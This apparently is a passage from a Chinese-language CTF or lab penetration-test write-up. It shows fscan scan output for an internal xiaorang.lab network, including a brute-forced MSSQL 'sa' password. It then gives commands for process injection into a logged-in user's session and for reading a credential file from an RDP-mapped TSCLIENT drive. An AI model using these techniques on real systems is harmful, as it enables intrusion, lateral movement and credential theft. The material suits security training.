┌──(kali㉿kali)-[~/桌面/Pentest/fscan]└─$ ./fscan -h 172.22.8.18/24
___ _
/ _ \ ___ ___ _ __ __ _ ___|| __
/ /_\/____/ __|/ __|'__/ _`|/ __||/ /
/ /_\\_____\__ \ (__|||(_||(__| <
\____/ |___/\___|_|\__,_|\___|_|\_\ fscan version: 1.8.4
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.8.15 is alive
(icmp) Target 172.22.8.31 is alive
(icmp) Target 172.22.8.18 is alive
(icmp) Target 172.22.8.46 is alive
[*] Icmp alive hosts len is: 4172.22.8.15:445 open
172.22.8.46:139 open
172.22.8.46:80 open
172.22.8.18:139 open
172.22.8.18:80 open
172.22.8.31:139 open
172.22.8.15:135 open
172.22.8.18:1433 open
172.22.8.46:135 open
172.22.8.18:135 open
172.22.8.46:445 open
172.22.8.15:139 open
172.22.8.18:445 open
172.22.8.31:445 open
172.22.8.31:135 open
172.22.8.15:88 open
172.22.8.18:10010 open
[*] alive ports len is: 17start vulscan
[*] WebTitle http://172.22.8.18 code:200 len:703 title:IIS Windows Server
[*] NetInfo
[*]172.22.8.31
[->]WIN19-CLIENT
[->]172.22.8.31
[*] NetInfo
[*]172.22.8.46
[->]WIN2016
[->]172.22.8.46
[*] WebTitle http://172.22.8.46 code:200 len:703 title:IIS Windows Server
[*] NetInfo
[*]172.22.8.18
[->]WIN-WEB
[->]172.22.8.18
[*] NetInfo
[*]172.22.8.15
[->]DC01
[->]172.22.8.15
[*] NetBios 172.22.8.15 [+] DC:XIAORANG\DC01
[*] NetBios 172.22.8.31 XIAORANG\WIN19-CLIENT
[*] NetBios 172.22.8.46 WIN2016.xiaorang.lab Windows Server 2016 Datacenter 14393[+] mssql 172.22.8.18:1433:sa 1qaz!QAZ
整理一下
172.22.8.15 XIAORANG\DC01
172.22.8.31 XIAORANG\WIN19-CLIENT
172.22.8.18 已拿下
172.22.8.46 WIN2016.xiaorang.lab
刚才找flag的时候,我发现了一个用户John,查看用户会话
1
2
shell net users
shell query user
进程注入这个用户
成功上线John用户
看看网络共享
1
2
3
4
shell net use
shell dir \\TSCLIENT\Cshell type\\TSCLIENT\C\credential.txt